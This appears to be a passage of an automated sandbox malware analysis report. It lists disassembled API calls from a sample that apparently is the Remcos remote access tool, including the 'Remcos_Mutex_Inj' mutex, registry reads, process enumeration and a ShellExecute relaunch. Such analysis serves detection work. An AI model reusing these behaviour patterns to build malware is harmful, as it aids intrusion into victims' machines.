                                                  • Part of subcall function 00411550: ?length@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIXZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,?,0040849C,?), ref: 004115D2
                                                  • Part of subcall function 00411550: ?length@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIXZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,0040849C,?), ref: 004115DF
                                                  • Part of subcall function 00411550: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,?,0040849C,?), ref: 00411631
                                                  • Part of subcall function 00411550: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,0040849C,?), ref: 0041163A
                                                  • Part of subcall function 00411550: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,0040849C,?), ref: 00411643
                                                • ??0?$basic_ofstream@DU?$char_traits@D@std@@@std@@QAE@PBDH@Z.MSVCP60(licence_code.txt,00000012,00000001,00000000), ref: 004084F8
                                                • ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(00000034), ref: 00408509
                                                • ??6std@@YAAAV?$basic_ostream@DU?$char_traits@D@std@@@0@AAV10@PBD@Z.MSVCP60(?,00000000), ref: 00408517
                                                • ?close@?$basic_ofstream@DU?$char_traits@D@std@@@std@@QAEXXZ.MSVCP60 ref: 00408525
                                                • ??_D?$basic_ofstream@DU?$char_traits@D@std@@@std@@QAEXXZ.MSVCP60 ref: 00408531
                                                • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 0040853A
                                                • ?data@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(00000003,00000000), ref: 00408553
                                                • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@PBDABV10@@Z.MSVCP60()A,Software\,00000000,0000000E,00413764), ref: 0040857B
                                                • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@PBD@Z.MSVCP60(?,00000000,?,0000000E,00413764), ref: 00408588
                                                • ??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z.MSVCP60(00000000,?,?,?,?,0000000E,00413764), ref: 00408598
                                                • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,0000000E,00413764), ref: 004085A1
                                                • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,0000000E,00413764), ref: 004085AA
                                                • ??A?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAADI@Z.MSVCP60(00000032,00000000,?,?,?,?,0000000E,00413764), ref: 004085BC
                                                • ??A?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAADI@Z.MSVCP60(00000033,00000000,?,?,?,?,0000000E,00413764), ref: 004085D8
                                                • ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(0041457C,)A,?,?,?,?,0000000E,00413764), ref: 004085FE
                                                • ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(0041457C,?,?,?,?,?,?,?,?,0000000E,00413764), ref: 0040861D
                                                • OpenMutexA.KERNEL32(00100000,00000000,Remcos_Mutex_Inj), ref: 00408647
                                                • WaitForSingleObject.KERNEL32(00000000,0000EA60,?,?,?,?,0000000E,00413764), ref: 0040865A
                                                • CloseHandle.KERNEL32()A,?,?,?,?,0000000E,00413764), ref: 00408663
                                                • ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(Inj,?,?,?,?,?,0000000E,00413764), ref: 00408674
                                                • ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(Inj,?,?,?,?,?,?,?,?,0000000E,00413764), ref: 00408693
                                                • ??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z.MSVCP60(00000000,0000000E,?,?,?,?,?,?,?,?,0000000E,00413764), ref: 004086B6
                                                • ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(?,?,?,?,?,?,?,?,0000000E,00413764), ref: 004086C1
                                                • CreateMutexA.KERNELBASE(00000000,00000001,00000000,?,?,?,?,?,?,?,?,0000000E,00413764), ref: 004086CB
                                                • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,0000000E,00413764), ref: 004086D1
                                                • GetModuleFileNameW.KERNEL32(00000000,00419994,00000104,?,?,?,?,?,?,?,?,0000000E,00413764), ref: 004086FB
                                                • ??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z.MSVCP60(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,0000000E,00413764), ref: 0040872D
                                                • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,0000000E,00413764), ref: 00408736
                                                • ??Y?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@PBD@Z.MSVCP60( (32 bit),?,?,?,?,?,?,?,?,?,?,?,?,?,0000000E,00413764), ref: 00408755
                                                • ?data@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(0000002E,?,?,?,?,?,?,?,?,?,?,?,?,?,0000000E,00413764), ref: 0040877B
                                                • ?find@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIPBDI@Z.MSVCP60(00413E04,00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,0000000E), ref: 004087A0
                                                • ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(origmsc,?,?,?,?,?,?,?,?,?,?,?,?,?,0000000E,00413764), ref: 004087BE
                                                  • Part of subcall function 0040A7DC: RegOpenKeyExA.ADVAPI32(00000000,00000000,00000000,00020019,00000000,80000001,?,00406E36,80000001,00000000), ref: 0040A7F2
                                                  • Part of subcall function 0040A7DC: RegQueryValueExA.ADVAPI32(00000000,80000001,00000000,00000000,00000000,00000000,00419970,?,00406E36,80000001,00000000), ref: 0040A807
                                                  • Part of subcall function 0040A7DC: RegCloseKey.ADVAPI32(00000000,?,00406E36,80000001,00000000), ref: 0040A812
                                                • ?data@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(00000027,?,?,?,?,?,?,?,?,?,?,?,?,?,0000000E,00413764), ref: 004087E6
                                                • ??4?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEAAV01@ABV01@@Z.MSVCP60(00000000,0000000B,?,?,?,?,?,?,?,?,?,?,?,?,?,0000000E), ref: 00408810
                                                • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,0000000E,00413764), ref: 00408819
                                                • ?data@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(00000004,?,?,?,?,?,?,?,?,?,?,?,?,?,0000000E,00413764), ref: 0040882A
                                                • ?data@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(00000005,?,?,?,?,?,?,?,?,?,?,?,?,?,0000000E,00413764), ref: 00408845
                                                • ?data@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(00000006,?,?,?,?,?,?,?,?,?,?,?,?,?,0000000E,00413764), ref: 00408860
                                                • ?data@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(00000007,?,?,?,?,?,?,?,?,?,?,?,?,?,0000000E,00413764), ref: 0040887B
                                                • ?data@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(00000008,?,?,?,?,?,?,?,?,?,?,?,?,?,0000000E,00413764), ref: 00408896
                                                • ?data@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(00000003,?,?,?,?,?,?,?,?,?,?,?,?,?,0000000E,00413764), ref: 004088B1
                                                • ?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ.MSVCP60(00000030,?,?,?,?,?,?,?,?,?,?,?,?,?,0000000E,00413764), ref: 004088D6
                                                • wcslen.MSVCRT ref: 004088DD
                                                • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,0000000E,00413764), ref: 004088E9
                                                • ?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ.MSVCP60(00000030,?,?,?,?,?,?,?,?,?,?,?,?,0000000E,00413764), ref: 0040890A
                                                • ?data@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(00000009,00000000,?,?,?,?,?,?,?,?,?,?,?,?,0000000E,00413764), ref: 0040891C
                                                • ??4?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEAAV01@ABV01@@Z.MSVCP60(00000000), ref: 00408937
                                                • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60 ref: 00408940
                                                • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60 ref: 00408949
                                                • ?data@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(0000001E,?,?,?,?,?,?,?,?,?,?,?,?,?,0000000E,00413764), ref: 00408974
                                                • ?data@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(0000000C,00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,0000000E), ref: 0040898B
                                                  • Part of subcall function 0040300F: LoadLibraryA.KERNEL32(ntdll,RtlGetNtVersionNumbers,00419970,00419BC8,00000000,?,?,?,?,?,?,?,?,?,004087DB), ref: 00403022
                                                  • Part of subcall function 0040300F: GetProcAddress.KERNEL32(00000000), ref: 00403029
                                                  • Part of subcall function 0040300F: ?length@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIXZ.MSVCP60(00000003,?,?,?,?,?,?,?,?,?,?,?,?,?,?,004087DB), ref: 00403076
                                                  • Part of subcall function 0040300F: ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,004087DB), ref: 0040307F
                                                  • Part of subcall function 0040300F: ?length@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIXZ.MSVCP60(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,004087DB), ref: 00403089
                                                  • Part of subcall function 0040300F: ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(00000001,?,?,?,?,?,?,?,?,?,?,?,?,?,?,004087DB), ref: 00403094
                                                  • Part of subcall function 0040300F: ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(origmsc,00000000), ref: 004030A5
                                                  • Part of subcall function 0040300F: ??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@PBGABV?$allocator@G@1@@Z.MSVCP60(00419994,?), ref: 004030CA
                                                  • Part of subcall function 0040300F: ?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ.MSVCP60(004137F0,004137F0,00000000), ref: 004030FA
                                                  • Part of subcall function 0040300F: ShellExecuteW.SHELL32(00000000,open,00000000), ref: 00403107
                                                  • Part of subcall function 0040300F: exit.MSVCRT ref: 00403113
                                                  • Part of subcall function 0040300F: ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60 ref: 0040311C
                                                  • Part of subcall function 0040300F: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 00403125
                                                • ?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ.MSVCP60(0000000A,00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,0000000E), ref: 004089AE
                                                  • Part of subcall function 004113E6: ?length@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIXZ.MSVCP60(00419970,00419BC8,00000000,00408808,)A,00000000,0000000B), ref: 004113F2
                                                  • Part of subcall function 004113E6: ??2@YAPAXI@Z.MSVCRT(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,0000000E,00413764), ref: 00411400
                                                  • Part of subcall function 004113E6: ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,0000000E,00413764), ref: 00411422
                                                  • Part of subcall function 004113E6: ??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@PBGABV?$allocator@G@1@@Z.MSVCP60(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,0000000E), ref: 00411444
                                                  • Part of subcall function 004113E6: ??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@ABV01@@Z.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,?,0000000E,00413764), ref: 00411458
                                                  • Part of subcall function 004113E6: ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,0000000E,00413764), ref: 00411461
                                                • ?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ.MSVCP60(00000030,00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,0000000E), ref: 004089CC
                                                • ?data@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(00000009,00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,0000000E), ref: 004089DE
                                                  • Part of subcall function 004072E6: wcslen.MSVCRT ref: 004072F5
                                                  • Part of subcall function 004072E6: ?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ.MSVCP60(00000000), ref: 0040730C
                                                  • Part of subcall function 004072E6: CreateDirectoryW.KERNEL32(00000000), ref: 00407313
                                                  • Part of subcall function 004072E6: ??Hstd@@YA?AV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@ABV10@PBG@Z.MSVCP60(?,00419BA0,00413888,?), ref: 00407326
                                                  • Part of subcall function 004072E6: ??Hstd@@YA?AV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@ABV10@PBG@Z.MSVCP60(?,00000000,?,?,?,?), ref: 00407333
                                                  • Part of subcall function 004072E6: ??4?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEAAV01@ABV01@@Z.MSVCP60(00000000,?,?,?,?,?,?,?), ref: 00407343
                                                  • Part of subcall function 004072E6: ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?), ref: 0040734C
                                                  • Part of subcall function 004072E6: ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?), ref: 0040737A
                                                  • Part of subcall function 004072E6: ?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ.MSVCP60(?,?,?,?,?,?,?), ref: 00407382
                                                  • Part of subcall function 004072E6: wcscmp.MSVCRT ref: 0040738F
                                                  • Part of subcall function 004072E6: ?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ.MSVCP60(?,?,?,?,?), ref: 004073A0
                                                • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60 ref: 004089F2
                                                • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60 ref: 004089FB
                                                • ?size@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEIXZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,0000000E,00413764), ref: 00408A12
                                                • ??2@YAPAXI@Z.MSVCRT(?,?,?,?,?,?,?,?,?,?,?,?,?,?,0000000E,00413764), ref: 00408A1D
                                                • ?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,0000000E,00413764), ref: 00408A28
                                                • wcscpy.MSVCRT ref: 00408A32
                                                • ?size@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIXZ.MSVCP60(00000003,?,?,?,?,?,?,?,?,?,?,?,0000000E,00413764), ref: 00408A41
                                                • ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(00000000,?,?,?,?,?,?,?,?,?,?,?,0000000E,00413764), ref: 00408A4D
                                                • ?size@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEIXZ.MSVCP60(00000000,?,?,?,?,?,?,?,?,?,?,?,0000000E,00413764), ref: 00408A56
                                                • ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(EXEpath,?,?,?,?,?,?,?,?,?,?,?,?,?,0000000E,00413764), ref: 00408A6E
                                                  • Part of subcall function 0040AC55: ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z.MSVCP60(?,?,?,?,00000000), ref: 0040AC91
                                                  • Part of subcall function 0040AC55: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 0040ACAD
                                                  • Part of subcall function 004127A4: free.MSVCRT ref: 004127A8
                                                • ??9std@@YA_NABV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@PBD@Z.MSVCP60(00000000,0000000D,00413984), ref: 00408A99
                                                • ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(00000028), ref: 00408B49
                                                • atoi.MSVCRT(00000000), ref: 00408B50
                                                • CreateThread.KERNEL32(00000000,00000000,00412442,00000000,00000000,00000000), ref: 00408B7F
                                                • ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(0000000F), ref: 00408B8C
                                                • ??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@ABV?$allocator@G@1@@Z.MSVCP60(?), ref: 00408BA0
                                                • ??8std@@YA_NABV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@PBG@Z.MSVCP60(00000000,00000031,004137F0), ref: 00408BC1
                                                • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60 ref: 00408BCF
                                                • ?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ.MSVCP60(00000011), ref: 00408BF1
                                                • ?data@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(00000010,00000000), ref: 00408C03
                                                • ??4?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEAAV01@ABV01@@Z.MSVCP60(00000000), ref: 00408C1C
                                                • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60 ref: 00408C25
                                                • ?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ.MSVCP60(00000031), ref: 00408C4A
                                                • ?data@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(00000010,00000000), ref: 00408C5C
                                                • ??4?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEAAV01@ABV01@@Z.MSVCP60(00000000), ref: 00408C77
                                                • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60 ref: 00408C80
                                                • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60 ref: 00408C89
                                                • ??Hstd@@YA?AV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@ABV10@PBG@Z.MSVCP60(?,00419894,00413888,00000000,00000011), ref: 00408CB3
                                                • ??Hstd@@YA?AV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@ABV10@0@Z.MSVCP60()A,00000000,?,00000000,00000011), ref: 00408CC0
                                                • ??4?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEAAV01@ABV01@@Z.MSVCP60(00000000,?,?,?,?,00000000,00000011), ref: 00408CCC
                                                • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,00000000,00000011), ref: 00408CD5
                                                • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,00000000,00000011), ref: 00408CDE
                                                • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,00000000,00000011), ref: 00408CE7
                                                • ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(00000036,?,?,?,?,00000000,00000011), ref: 00408CF8
                                                • atoi.MSVCRT(00000000,?,?,?,?,00000000,00000011), ref: 00408CFF
                                                  • Part of subcall function 004112FA: ?length@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIXZ.MSVCP60(00000020,?,?,?,00408107,?,?,?,?,?,?,?,00408E3E,?,?), ref: 00411309
                                                  • Part of subcall function 004112FA: ??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@IGABV?$allocator@G@1@@Z.MSVCP60(00000000,?,?,00408107,?,?,?,?,?,?,?,00408E3E,?,?), ref: 00411313
                                                  • Part of subcall function 004112FA: ?begin@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEPAGXZ.MSVCP60(?,?,00408107,?,?,?,?,?,?,?,00408E3E,?,?), ref: 0041131C
                                                  • Part of subcall function 004112FA: ?end@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(00000000,?,?,00408107,?,?,?,?,?,?,?,00408E3E,?,?), ref: 00411326
                                                  • Part of subcall function 004112FA: ?begin@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(00000000,?,?,00408107,?,?,?,?,?,?,?,00408E3E,?,?), ref: 00411330
                                                  • Part of subcall function 004112FA: ??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@ABV01@@Z.MSVCP60(?,?,?,?,?,?,00408107,?,?,?,?,?,?,?,00408E3E,?), ref: 00411346
                                                  • Part of subcall function 004112FA: ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,00408107,?,?,?,?,?,?,?,00408E3E,?,?), ref: 0041134F
                                                  • Part of subcall function 004090DB: GetModuleFileNameW.KERNEL32(00000000,?,00000104,00419958,00419BC8,00000000), ref: 004090F5
                                                  • Part of subcall function 004090DB: ??8std@@YA_NABV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@PBG@Z.MSVCP60(?,004146C0), ref: 0040910A
                                                  • Part of subcall function 004090DB: ??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@ABV?$allocator@G@1@@Z.MSVCP60(?), ref: 00409123
                                                  • Part of subcall function 004090DB: CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 0040912D
                                                  • Part of subcall function 004090DB: Process32FirstW.KERNEL32(?,?), ref: 00409149
                                                  • Part of subcall function 004090DB: Process32NextW.KERNEL32(?,0000022C), ref: 00409158
                                                  • Part of subcall function 004090DB: ??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@PBGABV?$allocator@G@1@@Z.MSVCP60(?,?,00000002,00000000), ref: 00409178
                                                  • Part of subcall function 004090DB: ?begin@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEPAGXZ.MSVCP60 ref: 00409187
                                                  • Part of subcall function 004090DB: ?end@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEPAGXZ.MSVCP60(00000000), ref: 00409191
                                                  • Part of subcall function 004090DB: ?begin@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEPAGXZ.MSVCP60(00000000), ref: 0040919B
                                                  • Part of subcall function 004090DB: ??8std@@YA_NABV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@0@Z.MSVCP60(?,?,00000000), ref: 004091AF
                                                  • Part of subcall function 004090DB: ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60 ref: 004091BF
                                                  • Part of subcall function 004090DB: Process32NextW.KERNEL32(?,0000022C), ref: 004091CF
                                                  • Part of subcall function 004090DB: ??4?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEAAV01@ABV01@@Z.MSVCP60(00000000), ref: 004091EB
                                                  • Part of subcall function 004090DB: ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60 ref: 004091F4
                                                  • Part of subcall function 004090DB: ??8std@@YA_NABV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@PBG@Z.MSVCP60(?,?), ref: 00409205
                                                  • Part of subcall function 004090DB: ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60 ref: 00409210
                                                  • Part of subcall function 004090DB: ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60 ref: 00409219
                                                  • Part of subcall function 004090DB: ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60 ref: 00409222
                                                • ??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@ABV01@@Z.MSVCP60(?,?,?,?,?,?,?,?,?,?,00000011), ref: 00408D30
                                                • ?data@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(00000014,?,?,?,?,?,?,?,?,00000000,00000011), ref: 00408D66
                                                • ??2@YAPAXI@Z.MSVCRT(00000002,?,?,?,?,?,?,?,?,00000000,00000011), ref: 00408D73
                                                • ?data@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(00000035,?,?,?,?,?,?,?,?,00000000,00000011), ref: 00408D89
                                                • CreateThread.KERNEL32(00000000,00000000,0040FC69,)A,00000000,00000000), ref: 00408DA4
                                                • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,00000000,00000011), ref: 00408F14
                                                Strings
                                                Memory Dump Source
                                                • Source File: 0000000B.00000002.2304661050.0000000000401000.00000020.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 0000000B.00000002.2304616306.0000000000400000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                • Associated: 0000000B.00000002.2304735960.0000000000413000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                • Associated: 0000000B.00000002.2304782815.0000000000419000.00000004.00000400.00020000.00000000.sdmpDownload File
                                                • Associated: 0000000B.00000002.2304811098.000000000041A000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_11_2_400000_file.jbxd
                                                Yara matches
                                                Similarity
